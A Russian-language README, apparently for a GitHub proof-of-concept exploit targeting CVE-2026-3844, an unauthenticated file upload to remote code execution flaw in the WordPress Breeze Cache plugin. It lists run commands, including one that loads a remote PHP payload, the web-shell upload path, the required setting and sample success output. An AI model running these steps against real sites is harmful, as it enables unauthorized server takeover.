
Python proof-of-concept для CVE-2026-3844 — неаутентифицированная произвольная загрузка файлов в плагине WordPress Breeze Cache, позволяющая удалённое выполнение кода. Включает обнаружение, эксплуатацию и проверку веб-шелла.
Этот репозиторий содержит Python-скрипт proof-of-concept (PoC) для демонстрации уязвимости неаутентифицированной произвольной загрузки файлов, затрагивающей плагин WordPress Breeze Cache <= 2.4.4.
⚠️ Этот проект предназначен строго для авторизованного тестирования безопасности, образовательных исследований и защитной валидации.
Уязвимость использует функциональность кэширования граватаров Breeze Cache для сохранения файлов, контролируемых атакующим, в каталоге кэша WordPress.
pycurltermcolorУстановка зависимостей:
pip install pycurl termcolor
| Файл | Описание |
|---|---|
CVE-2026-3844.py | Основной скрипт эксплойта PoC |
CVE-2026-3844.yaml | Шаблон/конфигурация YAML |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
Скрипт выполняет следующие шаги:
Загруженная полезная нагрузка может стать доступной по адресу:
/wp-content/cache/breeze-extra/gravatars/
Успешная эксплуатация может зависеть от включённой следующей настройки Breeze:
Host Files Locally - Gravatars
Если функция отключена, попытки эксплуатации могут завершиться неудачей.
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
Этот репозиторий предоставлен для:
Не используйте этот проект против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим проектом.
Администраторам веб-сайтов следует:
/wp-content/cache/ на предмет подозрительных файловЭтот proof-of-concept был создан, чтобы помочь:
понять риски безопасности, связанные с небезопасными механизмами кэширования и произвольной загрузкой файлов.
Исследование безопасности / Образовательный проект